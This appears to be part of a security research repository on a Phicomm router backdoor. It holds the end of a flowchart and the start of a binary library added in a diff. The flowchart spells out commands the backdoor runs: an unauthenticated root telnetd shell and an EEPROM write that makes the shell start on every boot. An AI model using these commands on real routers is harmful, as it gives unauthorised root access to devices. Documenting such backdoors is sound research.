fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="155.3740030207728" y="2754.982298709" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Compute the </text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="292.12400302077276" y="2754.982298709" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">MD5</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="342.5406709590052" y="2754.982298709" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> hash of </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="428.8906694331263" y="2754.982298709" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RAW_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="522.3073335566614" y="2754.982298709" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">, and store</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="155.3740030207728" y="2776.3437184090003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">the result in </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="282.07399996901495" y="2776.3437184090003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">BACKDOOR_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="444.9739938654993" y="2776.3437184090003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">.</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="155.3740030207728" y="2797.7051381090005" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="155.3740030207728" y="2819.0665578090006" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Here, all we need to do is compute the MD5</text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="155.3740030207728" y="2840.427977509001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">hash of </text><text fill="darkred" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="245.607332793722" y="2840.427977509001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">+TEMP</text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="324.22400149489386" y="2840.427977509001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> or </text><text fill="darkred" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="361.7573343196009" y="2840.427977509001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">+PERM</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 116.21140023743945 2848.972545389 L 212.33778888743944 2848.972545389 L 212.33778888743944 2876.7423909990002 L 144.4796789737728 2876.7423909990002" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray="8.544567879999999"/><g transform="translate(126.89211008743945,2876.7423909990002) translate(-126.89211008743945,-2876.7423909990002)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 144.6932931707728 2867.8417994573338 L 126.89211008743945 2876.7423909990002 L 144.6932931707728 2885.6429825406667 Z"/></g></g><g><g><rect fill="white" stroke="none" x="375.47930444793406" y="2908.7845205490003" width="324.39175186825196" height="27.769845609999997"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="378.68351740293406" y="2928.0097982790003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Send </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="435.41685099058054" y="2928.0097982790003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">BACKDOOR_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="598.3168448870649" y="2928.0097982790003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> to Server</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 126.89211008743945 2936.5543661590004 L 930.8706817903475 2936.5543661590004" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray="8.544567879999999"/><g transform="translate(948.4582506766808,2936.5543661590004) translate(-948.4582506766808,-2936.5543661590004)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 930.6570675933475 2927.653774617334 L 948.4582506766808 2936.5543661590004 L 930.6570675933475 2945.454957700667 Z"/></g></g><g><g><rect fill="white" stroke="none" x="995.097350355014" y="2968.5964957090005" width="444.4750834531824" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="995.097350355014" y="2989.9579154090006" width="423.8250838346521" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="995.097350355014" y="3011.319335109001" width="409.64176331234376" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="995.097350355014" y="3032.680754809001" width="394.2250877447168" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="995.097350355014" y="3054.042174509001" width="183.6084228582422" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="995.097350355014" y="3075.4035942090013" width="6.408425909999999" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="995.097350355014" y="3096.7650139090015" width="446.1584178037683" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="995.097350355014" y="3118.1264336090017" width="442.9917555875818" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="995.097350355014" y="3139.487853309002" width="436.6250868864099" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="995.097350355014" y="3160.849273009002" width="464.625093085293" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="995.097350355014" y="3182.210692709002" width="484.7417541570703" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="995.097350355014" y="3203.5721124090023" width="445.4917465276758" height="27.769845609999997"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="998.301563310014" y="2987.8217734390005" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">If</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1014.4348965161907" y="2987.8217734390005" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1020.7848964208233" y="2987.8217734390005" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">BACKDOOR_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1183.6848903173077" y="2987.8217734390005" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> matches </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1282.3682246678936" y="2987.8217734390005" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">TEMP_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1384.5015559667218" y="2987.8217734390005" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> then</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="998.301563310014" y="3009.1831931390007" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">call </text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1039.0015640729534" y="3009.1831931390007" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">system("</text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1139.3515625470745" y="3009.1831931390007" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">telnetd -l /bin/login.sh</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1389.818222092973" y="3009.1831931390007" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">")</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1409.3682213300335" y="3009.1831931390007" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">,</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="998.301563310014" y="3030.544612839001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">launching an unencrypted </text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1267.0182381147015" y="3030.544612839001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">telnetd</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1348.6849022382366" y="3030.544612839001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> shell</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="998.301563310014" y="3051.906032539001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">as </text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1027.3182297223675" y="3051.906032539001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">root</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1074.2182312482464" y="3051.906032539001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">. No credentials are required to</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="998.301563310014" y="3073.267452239001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">log into this shell.</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="998.301563310014" y="3094.6288719390013" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="998.301563310014" y="3115.9902916390015" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">If</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1014.4348965161907" y="3115.9902916390015" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1020.7848964208233" y="3115.9902916390015" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">BACKDOOR_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1183.6848903173077" y="3115.9902916390015" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> matches </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1282.3682246678936" y="3115.9902916390015" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">PERM_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1386.1848903173077" y="3115.9902916390015" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> then</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="998.301563310014" y="3137.3517113390017" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">call </text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1039.0015640729534" y="3137.3517113390017" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">system("</text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1139.3515625470745" y="3137.3517113390017" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">iwpriv ra0 e2p 26=7010</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1408.9848938459027" y="3137.3517113390017" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">")</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1428.5348930829632" y="3137.3517113390017" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">,</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="998.301563310014" y="3158.713131039002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">writing the bytes [HEX: </text><text fill="darkgreen" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1236.4348946088421" y="3158.713131039002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">7010</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1287.3015594953167" y="3158.713131039002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">] to </text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1327.8848915570843" y="3158.713131039002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">EEPROM</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1422.1682243817913" y="3158.713131039002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">,</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="998.301563310014" y="3180.074550739002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">at offset </text><text fill="darkgreen" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1087.6848946088421" y="3180.074550739002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">0x26</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1137.6682281964886" y="3180.074550739002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> (virtual address </text><text fill="darkgreen" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1307.0182343000042" y="3180.074550739002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">0x40026</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1395.1515655988323" y="3180.074550739002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">). This</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="998.301563310014" y="3201.435970439002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">code will instruct the </text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1214.0182228559124" y="3201.435970439002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">telnetd_startup</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1388.6348915570843" y="3201.435970439002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> daemon</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="998.301563310014" y="3222.7973901390023" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">to launch </text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1097.9348946088421" y="3222.7973901390023" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">telnetd -l /bin/login.sh</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1348.4015541547406" y="3222.7973901390023" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> on boot.</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 969.8196703766807 3231.3419580190002 L 1055.2653491766807 3231.3419580190002 L 1055.2653491766807 3259.1118036290004 L 987.407239263014 3259.1118036290004" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray="8.544567879999999"/><g transform="translate(969.8196703766807,3259.1118036290004) translate(-969.8196703766807,-3259.1118036290004)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 987.620853460014 3250.211212087334 L 969.8196703766807 3259.1118036290004 L 987.620853460014 3268.012395170667 Z"/></g></g></g><g/><g/></g></svg>
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/lib/libcrypto.a b/Phicomm/backdoor-lockpick_tra-2022-01/lib/libcrypto.a
new file mode 100644
index 0000000000000000000000000000000000000000..7b7176403deccec933c0d45750bd43e98e334e50
GIT binary patch
literal 3086838
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
